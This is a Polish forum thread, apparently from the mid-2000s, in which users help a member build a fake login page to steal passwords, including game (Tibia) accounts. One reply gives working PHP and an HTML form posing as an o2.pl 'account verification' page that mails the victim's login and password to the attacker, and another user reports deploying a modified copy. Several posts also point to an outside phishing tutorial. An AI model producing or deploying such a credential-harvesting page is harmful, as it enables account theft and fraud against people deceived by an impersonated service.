Zapisywanie, wysyłanie danych ze strony.

erro

Użytkownik
Dołączył
Kwiecień 15, 2006
Posty
2
Chcialbym zrobic cos na podobienstwo keylogera..nie wiem jak to nazwac i nie wiem jak o tym cos znalesc...Chodzi mi o takie cos ze robie podobna strone do jakiejs gdzie wpisuje sie hasla loginy...no i tak ktos wpisze tam chaslo do tej podrobionej strony to te wpisane dane wysylaja sie do mnie np.na skrzynke pocztowa??Jak ktos cos zrozumial to prosze o jakies podpowiedzi jak zrobic te poa gdzie sie wpisuje login i hasło...
 

tianhao

Użytkownik
Dołączył
Czerwiec 19, 2004
Posty
307
Re: Nie wiem gdzie to dac...skrypt na strone?

Originally posted by erro
Chcialbym zrobic cos na podobienstwo keylogera..nie wiem jak to nazwac i nie wiem jak o tym cos znalesc...Chodzi mi o takie cos ze robie podobna strone do jakiejs gdzie wpisuje sie hasla loginy...no i tak ktos wpisze tam chaslo do tej podrobionej strony to te wpisane dane wysylaja sie do mnie np.na skrzynke pocztowa??Jak ktos cos zrozumial to prosze o jakies podpowiedzi jak zrobic te poa gdzie sie wpisuje login i hasło...

Powiedz mi czy wiesz co znacyz szukaj?
 

Grzem

Użytkownik
Dołączył
Marzec 18, 2006
Posty
55
To fachowo nazywa sie net phishing. Gdzieś widziałem świetny poradnik do tego tylko nie wiem gdzie
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
po prostu nie rozumiem jakis lamer napisal zebyscie za niego zrobili strone przechwytujaca hasla i wy zamiast wywalic ten temat to mu jeszcze podpowiadacie jak to zrobic przeciez on nie chce podpowiedzi tylko gotowca :/ a jak by jeszcze poszukal to by znalazl nawet na tym forum i nie musial by zaduzo zmieniac bo jest o tibi cos :/;/;/;/
 

gorący chłopiec

Użytkownik
Dołączył
Marzec 8, 2006
Posty
15
Ja też potrzebuje pomocy!
Również w tibii!
Patrzyłem na forum i nie znalazłem nic o tibii!
Zrobiłem temat ale nikt mi nie pomaga!
Czytałem troche o tym ale z tego co wiem nic sie nie da zrobić bo stronka tibia.com( autorstwa cipsoftu) jest blokowana przed kopiowaniem!
Pomoc!
 

FDJ

Były Moderator
Dołączył
Maj 23, 2005
Posty
1044
zacznijmy od tego ze bozuch dawal tu takie cos :/ po drugie znajdziecie podobne na hw.haker.com.pl i tez o tibi
<
 

gorący chłopiec

Użytkownik
Dołączył
Marzec 8, 2006
Posty
15
dziekuje wam wszystkim za pomoc!
Teraz ja udziele sie dla erro!
Wejdz na hw.haker.com.pl i znajdz temat na forum "tibia - kradziez konta phishing" i poczytaj!

Nacisnij pomogł!
 

Gandziorz

Użytkownik
Dołączył
Luty 5, 2005
Posty
114
heh najlepiej zrob stronke podobna do strony skad chcesz ukrasc haslo i cos takiego zrob:
<?php
if ($_POST['action'] == '1') {
$header = "From: Weryfikacja o2.pl <[email protected]>";
$message = "Weryfikację konta przebiegła pomyślnie.n Oto twoje dane do skrzynki:n Login: $loginn Hasło: $haslonn Dziękujemy zespół o2.pl";
$email = '[email protected]';
$twojemail = '[email protected]';
@mail("$email, $twojemail","Weryfikacja skrzynki pocztowej","$message","$header");
echo"Weryfikacja konta przebiegła pomyślnie";
} ?>

Przeprowadzamy weryfikacje nie aktywnych kont, prosimy podać login i hasło aby konto nie zostało utracone.


<form method=post>
<input type=hidden name="action" value=1>
Login: <input type="text" name="login">

Hasło: <input type="password" name="haslo">

<input type="submit" name="submit" value="Weryfikuj">
</form>[/b]
Czy to takie trudne? Możesz ten formularz zmodyfikować pod co chcesz prawde. Dostaniesz "potwierdzenie" ty i ta osoba.
 

gorący chłopiec

Użytkownik
Dołączył
Marzec 8, 2006
Posty
15
Zrobiłem strone i zmodyfikowałem ją odpowiednio, zamieściłem w internecie i chciałem sprawdzić na sobie napisałem swoje pasy i nic nie zadziałało, tzn żadne dane nie doszły do maila na którego zmodyfikowałem strone.
 
Do góry Bottom